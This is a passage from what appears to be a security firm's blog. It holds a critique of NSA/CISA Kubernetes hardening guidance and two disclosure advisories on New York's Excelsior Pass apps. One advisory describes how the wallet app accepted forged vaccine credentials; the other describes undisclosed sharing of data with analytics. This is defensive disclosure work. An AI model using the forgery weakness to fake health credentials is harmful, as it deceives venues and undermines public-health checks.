On the whole, the guidance provided is sensible and will help administrators bring their clusters to a reasonable and secure state.

The high level guidance from the document is as below:

  • Scan containers and Pods for vulnerabilities or misconfigurations
  • Run containers and Pods with the least privileges possible
  • Use network separation to control the amount of damage a compromise can cause
  • Use firewalls to limit unneeded network connectivity and encryption to protect confidentiality
  • Use strong authentication and authorization to limit user and administrator access as well as to limit the attack surface
  • Use log auditing so that administrators can monitor activity and be alerted to potential malicious activity
  • Periodically review all Kubernetes settings and use vulnerability scans to help ensure risks are appropriately accounted for and security patches are applied

Each of these points relate back to the generic guidance for almost any platform, regardless of the technology in use: restrict access through authentication and network filtering, log what is permitted and what gets requested, apply security options where available, and keep components up to date.

The guidance also calls out the common sources of compromise, identifying supply chain attacks, malicious threat actors, and insider threats. Despite “malicious threat actors” covering a fairly broad scope as an answer to “who wants to hack us?”, these three sources of compromise cover the majority of the attack paths we have followed when reviewing customer environments.

High Level Recommendations

Scan Container Images

Vulnerability scanning is a key component of staying secure, regardless of the platform used. Performing image scanning on your images can be a good way to prevent the software you are running from becoming open to newly identified vulnerabilities.

Patching container images generally needs to happen in two stages: downloading fresh versions of the published image from a vendor, and applying any patches which have been released since the image was last built through a package manager like apt or yum. As with patching of any other system, care should be taken to ensure that all of your software still works as intended after any patches have been applied. You should also make sure all images are pulled from trusted sources (such as official Docker images, or images from verified publishers). Additionally, any programming language based dependencies (Ruby/Bundler, Python/Pip etc.) should be updated regularly.

Follow the Principle of Least Privilege

Running containers with the lowest level of privileges possible will help to reduce the blast radius of a compromise, reducing what an attacker is able to do should they gain access to a single pod through a remote code execution (RCE) vulnerability in a microservice or similar. This can be accomplished in a few ways, the simplest of which is to build container images to run as a non-root user.

Kubernetes can also force a container to run as a specific user through the use of the SecurityContext directive. This approach is effective, but may result in file permission problems in images which expect to be run as UID 0.

The NSA/CISA guidance does also mention the possibility to use a rootless Docker engine. While this can work for a standalone Docker instance, support is not widely available for running a rootless engine in Kubernetes and doing so is generally not advised on production systems.

Another option is to use user namespacing, effectively allowing contained processes to run “as root” inside but mapping to a non-0 UID on the host. This feature is supported on Docker, but is only in alpha levels of support in Kubernetes.

The concepts applied to running pods should also be applied to anywhere authentication and authorization are applied, such as Kubernetes RBAC and service account configurations. Service accounts have permissions which are effectively granted to any running pod configured to use that account. These permissions are rarely required for standard applications, and so most service accounts do not need any permissions at all.

Isolate Networks

Suggesting enforcing isolation between components is common security advice. Recommending the use of both host/network firewalling and Kubernetes network policies to provide this isolation is good advice, and something that we generally don’t see enough of on customer engagements. It’s not uncommon for us to see environments where the Kubernetes apiserver is exposed to the internet, and for the cluster itself to be completely flat. This means any compromise of one service can provide an attacker with a path to other services, some of which may be running without authentication requirements.

As a minimum we recommend isolating namespaces through the use of a default deny-all network policy for both ingress and egress, then only permitting the connections that are explicitly required. For more sensitive environments we often see customers choose to use a service mesh such as Istio or Linkerd to provide further filtering and additional encryption, however these options do tend to increase operational complexity significantly (and aren’t without their own security issues).

Logging Configuration

Like with network isolation, we regularly see customer deployments running without any logging or auditing enabled. Enabling these features will massively help to identify ongoing attacks should your cluster be targeted, as well as providing essential forensic information should the worst happen and the cluster be compromised by a malicious user.

Regular Configuration Review

Kubernetes clusters require ongoing maintenance, and are not systems which can be simply set-and-forget. Between the relentless patching cycle and an increasing number of security releases and bugfixes and changes to API versions, regular config changes will be required. Checking that security options are applied correctly or tweaking configurations to improve the security posture over time is expected as part of routine maintenance.

As discussed extensively in the released document, Kubernetes clusters are rarely configured securely out of the box. For organisations running multiple clusters, having a standardised deployment process with known-secure options applied will help you ensure consistency.

The Bad

Some of the advice contained in the CTR was not as accurate or up-to-date as guidance from other sources. While not necessarily bad advice, some of the core concepts in Kubernetes security are not discussed in the document, or are not given the attention they deserve.

PSP Deprecation

The biggest issue I have with the guidance is the over-reliance on Pod Security Policy (PSP) as a solution for a range of problems. When first released, PSP was the only available control to prevent a user with the ability to create pods from compromising an entire node in a trivial manner. The guidance correctly points out the many features of PSP, but it does not call out that the PSP feature is officially deprecated, and will be removed in the 1.25 release. This may be because the authors did not want to recommend a specific third party alternative, and the official replacement was only recently formalised.

Several technologies have appeared over the last few years which have aimed to fix holes in the PSP model, including OPA Gatekeeper, Kyverno, and k-rail. The official replacement to PSP, a newly introduced alpha feature called PodSecurity, will be added in Kubernetes 1.22 when it releases later this year.

The deprecation of PSP has only been a matter of time, and our advice for some time now has been to implement one of the PSP replacements rather than spend large amounts of engineering time on a feature that will be removed in the next year. Until the PodSecurity admission controller is more mature, this is still our recommendation to customers.

Admission Controllers

Pod Security Policy, and each of the alternatives, is implemented as an admission controller in a Kubernetes cluster. Admissions controllers are an “extra” step, required for approval after a request has passed authentication and authorization checks. These controllers can provide a vast amount of security hardening in an automated manner. Despite this, they were only mentioned in the released guidance once, as part of the image scanning section.

A well-configured admission controller can automatically enforce a significant number of the checks around pod security, for instance by blocking pods which attempt to run with the privileged flag, or programmatically adding the “RunAsUser” field to force every pod to run as a non-root user.

Inconsistencies/Incorrect Information

The CTR did contain a couple of inconsistencies, or pieces of information which were not correct. For example, page 4 of the guidance states that both the Kubelet and the Scheduler run on TCP 10251 by default. In actuality the Kubelet’s default port is TCP port 10250 for the read-write port, and 10255 for the soon-to-be-deprecated read-only port. Page 15 does provide the correct information for the Kubelet’s read-write port, but does not make any mention of the read-only port. Similarly, the kube-scheduler component runs on TCP port 10259, not 10251, in modern installs, and the controller-manager runs on 10257.

Kubernetes also has an insecure API mode, which the CTR correctly identifies as bypassing all AuthN/AuthZ checks and not using TLS encryption. However, this insecure port was deprecated in version 1.20. Since this release, the –insecure-port flag is only accepted as a parameter if the value is set to 0. If you are running a cluster and have the insecure port enabled, access should be extremely locked down and well monitored/audited, but in general there is no reason this port should be enabled in a modern cluster.

Authentication Issues

When it comes to authentication, the CTR is largely incorrect when it states that Kubernetes does not provide an authentication method by default. While the specifics will vary from install to install, the majority of clusters we review support both token and certificate authentication, both of which are supported natively. While these are supported, we generally advise against using either for production workloads as each have their downsides. In particular, client certificate authentication can provide issues when it comes removing access should it be required to cut off a cluster administrator, as Kubernetes does not support certificate revocation. This becomes more of an issue if an attacker managed to gain access to a certificate issued to the group system:masters, as this group has hard-coded administrative access to the apiserver.

The Complex

With a project as complicated as Kubernetes, it is not possible to cover every option and every edge case in a single document, so trying to write a piece of one size fits all guidance won’t be possible. Here, I would like to offer considerations for some of the more common complex use cases not covered by the CTR guidance. This includes coming up with a useful audit configuration that won’t require excessive levels of compute power or storage, handling external dependencies, and some notes around the complex mechanisms of Kubernetes RBAC.

Levels of Audit Data

While enabling auditing is an excellent idea for a cluster, Kubernetes is heavily reliant on control loops that constantly generate HTTP requests. Logging of every request, and particularly logging the request and response data as suggested in Appendix L of the released guidance, would result in massive amounts of data being stored with the vast majority of this information being expected and not of much use for forensics or debugging. Similarly, the guidance explicitly suggests logging for all pod creation requests, which will result in a large amount of data being stored by routine actions such as pods scaling or being moved from one node to another by a scheduler. Instead of logging full requests, we recommend writing a tailored policy which includes metadata for most requests, and only storing full request/response information for particularly sensitive calls. The exact logging requirements will vary from deployment to deployment in line with your security standards but, in general, logging everything is not considered essential, and can have adverse effects on storage requirements and processing time. In some cases, it can drastically increase operational costs if logs are ingested to a cloud service or a managed service which charges per log-entry.

Sidecar Resource Requirements

Similarly, the CTR advises that logging can be performed in a number of ways. This is true, and again the option you choose will depend on your specific setup. However, logging sidecars on every container does come with an increase in deployment complexity and a significant increase in resource requirements per pod.

Again, there is no “correct” logging deployment, and each option will have pros and cons. That said, it may be more efficient to have containers log to a specific directory on each node and use either a daemonset or some component of the host configuration to pick up these logs and pass them to a centralised logging location.

External Dependencies are essential

The core of a Kubernetes cluster is comprised of container images, which are generally pulled from an external source. For example the apiserver is generally retrieved from k8s.gcr.io/kube-apiserver. Even excluding the core components, most cloud-native technologies tend to assume they’re being run in a highly connected environment where updates can be retrieved in a trivial manner.

Most Kubernetes clusters can be reconfigured to require only local images, but if you decide to enable such restrictions, performing updates will become much more difficult. Given the update cadence of Kubernetes, increasing upgrade friction may not be something you want, leading to the old tradeoff of usability vs security. On the other hand, always pulling the latest version of an external dependency without performing any validation and security testing may open an organisation to supply-chain compromise. The likelihood of this varies, as some repositories will be better monitored and are less likely to be compromised in the first place, but it’s still something to consider.

Container signing is still very much not a solved problem. Historically, Docker Content Trust was viewed as the best option where it was enabled, but that mechanism was not without its problems and is no longer maintained. Several solutions are being worked on, including sigstore.

As well as verifying that your external dependencies are legitimate and not altered from the original packages, these containers may contain security vulnerabilities. At time of writing, the image k8s.gcr.io/etcd:3.5.0-0 (the newest version packed for Kubernetes) has packages vulnerable to CVE-2020-29652 which shows as a high risk vulnerability when scanned with an image scanner like Trivy or Clair. Again, you could probably take on the task of patching these images but that leads to further problems: Do you want to be responsible for performing all testing that patching will require, and what will you do when images contain vulnerabilities for which no patch exists?

RBAC is hard

Kubernetes RBAC is a difficult thing to configure well, and on engagements we regularly see customers who have an RBAC configuration allowing users or attackers to escalate their permissions, often to the point of gaining full adminsitrative control over the cluster. Plenty of guidance is available on the internet around how to do Kubernetes RBAC securely, and that goes way beyond the scope of this post.

Patching Everything is hard

This post has already discussed the difficulties of keeping everything published in containers, but patching of the worker nodes themselves is equally important. Unless you’re running a cluster backed by something like AWS’ Fargate, containers are still running on a computer that you need to keep updated. Vulnerabilities have historically been identified in every step of the execution chain, from Kubernetes to Containerd to runc and the Linux kernel. Keeping all of these components updated can be challenging, especially as there’s always the chance of breaking changes and requirements for downtime.

This is something that Kubernetes can help with, as the whole concept of orchestration is intended to keep services running even as nodes go on and offline. Despite this, we still regularly see customers running nodes that haven’t had patches applied in several months, or even years. (As a tip, server uptime isn’t a badge of honour as much as it used to be; it’s more likely indicative that you’re running an outdated kernel).

Closing Thoughts

The advice issued in this NSA/CISA document has a solid technical grounding and should generally be followed, but some aspects are outdated or are missing some key context. This is almost always the case with anything in Kubernetes given the rapid development pace at which the project is still working. As with any technical security guidance, documents such as this CTR should be taken as guidance and reviewed with suitable levels of business/security context, because when it comes to container security, one size definitely does not fit all.

Technical Advisory – New York State Excelsior Pass Vaccine Passport Credential Forgery

1 September 2021 at 19:00
Vendor: New York State
Vendor URL: https://play.google.com/store/apps/details?id=gov.ny.its.healthpassport.wallet
Versions affected: 1.2.0
Systems Affected: Android Google Play Store
Author: Siddarth Adukia sid.adukia[at]nccgroup[dot]com

Summary

New York State developed an application called NYS Excelsior Pass Wallet that allows users to acquire and store a COVID-19 vaccine credential. During some research it was discovered that this application does not validate vaccine credentials added to it, allowing forged credentials to be stored by users.

Impact

This issue would allow an individual to create and store fake vaccine credentials in their NYS Excelsior
Pass Wallet that might allow them to gain access to physical spaces (such as businesses and event venues) where they would not be allowed without a vaccine credential, even when they have not received a COVID-19 vaccine.

Details

The Wallet application can add a pass directly by interacting with the NYS servers, or through scanning a QR code or photo. In neither case is the credential verified, allowing forged credentials to be added to the Wallet. Screenshots of forged credentials are included; these may be scanned by the Wallet app and added as a legitimate pass.

If a business does not properly use the NYS Scanner application, or ignores the invalid pass warning in the Scanner app and trusts the pass shown in the Excelsior Wallet app on a user’s smartphone, it could allow individuals to fake vaccine credentials and gain access to physical spaces that are only supposed to be accessible to those with valid, legitimate proof of vaccination.

Fix from Vendor

Vendor informed NCC Group they intend to implement verification for vaccine credentials added to the NYS Excelsior Pass Wallet. This fix was released in the August 20 2021 version of the app.

Recommendation to Users

Update to the latest version of the application.

Users of he NYS Excelsior Pass Scanner (such as businesses and event venues) should take care while scanning presented vaccine credentials to confirm that each presented credential is successfully validated by the Scanner application to ensure that a presented credential is legitimate.

Vendor Communication

2021-04-30 NCC Group starts disclosure to NYS via support form - no response
2021-06-07 NCC Group submits another request to coordinate a disclosure - no response
2021-06-10 NCC Group calls NYS Excelsior support and is instructed to wait or contact the Department of Health 
2021-06-17 NCC Group emails DOH requesting to start disclosure process - no response
2021-06-25 NCC Group emails DOH to follow up on previous email - no response
2021-07-08 NCC Group emails DOH and requests acknowledgment - no response 
2021-07-16 NCC Group emails NYS ITS Cyber command center requesting to start a disclosure 
2021-07-20 NYS ITS sets up meeting to discuss vulnerabilities
2021-07-21 NCC Group meets with NYS ITS team and shares vulnerabilities and recommends fixes
2021-07-21 NYS ITS sends email with patch details and date 
2021-08-20 Patch released
2021-09-01 Advisory published

About NCC Group

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate & respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.

Published date:  2021-09-01

Written by:  Siddarth Adukia

[Editor’s note: The disclosure timeline on this post was updated September 2 2021 to correct the patch date which was incorrectly noted in the original post. This was also corrected in the “Fix from Vendor” section. The issue was patched on August 20 2021; the original advisory had stated that it was August 12 2021]

Technical Advisory – New York State Excelsior Pass Vaccine Passport Scanner App Sends Data to a Third Party not Specified in Privacy Policy

1 September 2021 at 19:00
Vendor: New York State
Vendor URL: https://covid19vaccine.health.ny.gov/excelsior-pass
Versions affected: iOS 1.4.1, Android 1.4.1
Systems Affected: iOS, Android
Author: Dan Hastings dan.hastings[at]nccgroup[dot]trust
Advisory URL / CVE Identifier:
Risk: Information Leakage

Summary

The New York State (NYS) Excelsior scanner app is used by businesses or event venues to scan the QR codes contained in the NYS Excelsior wallet app to verify that an individual has either a negative COVID-19 test or their vaccination status. We have found that some data about the businesses/event venues using the app to scan QR codes is also sent to a third-party analytics domain, but that this was not specified in the app’s privacy policy.

Impact

The NYS scanner app’s privacy policy does not match up to the actual data collection practices of the application, resulting in data being sent to an analytics third party that was not specified in advance to users of this app.

Details

The NYS Excelsior scanner privacy policy (https://epass.ny.gov/privacy-scanner) describes that the Business Name, Industry Type and Zip Code are all collected by the scanner app. The policy also states in the “How Data is Used” clause that “App data, , including Business Name, Industry Type, Zip Code, Pass type (vaccination, PCR, antigen), and Scan Result (valid, invalid, expired, pass not found), is collected and stored securely and is only shared with NYS”. 

In a request to the domain https://app-measurement.com (which is used for Google Analytics) the Business Name, Industry Type and Zip Code of the business/event venue using the scanner are all sent, which was not specified in the app’s privacy policy.

Fix from Vendor

Vendor informed NCC Group that updates will be made to the privacy policy to clarify that Business Name, Industry Type and Zip Code data will be shared with third parties.

Recommendation to Scanner App Users

Update to the latest version of the application.

Vendor Communication

2021-04-30 Starts disclosure to NYS via support form - no response
2021-06-07 Submits another request to coordinate a disclosure - no response
2021-06-10 Calls NYS Excelsior support and is instructed to wait or contact the Department of Health 
2021-06-17 Emails DOH requesting to start disclosure process - no response
2021-06-25 Emails DOH to follow up on previous email - no response
2021-07-08 Emails DOH and requests acknowledgment - no response 
2021-07-16 Emails NYS ITS Cyber command center requesting to start a disclosure 
2021-07-20 ITS sets up meeting to discuss vulnerability’s
2021-07-21 Meets with ITS team and shares vulnerabilities and recommends fixes
2021-07-21 ITS sends email with patch details and date 
2021-08-12 Patch released
2021-09-01 Advisory publication 

About NCC Group

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate & respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.

Published date: 2021-09-01

Written by: Dan Hastings

❌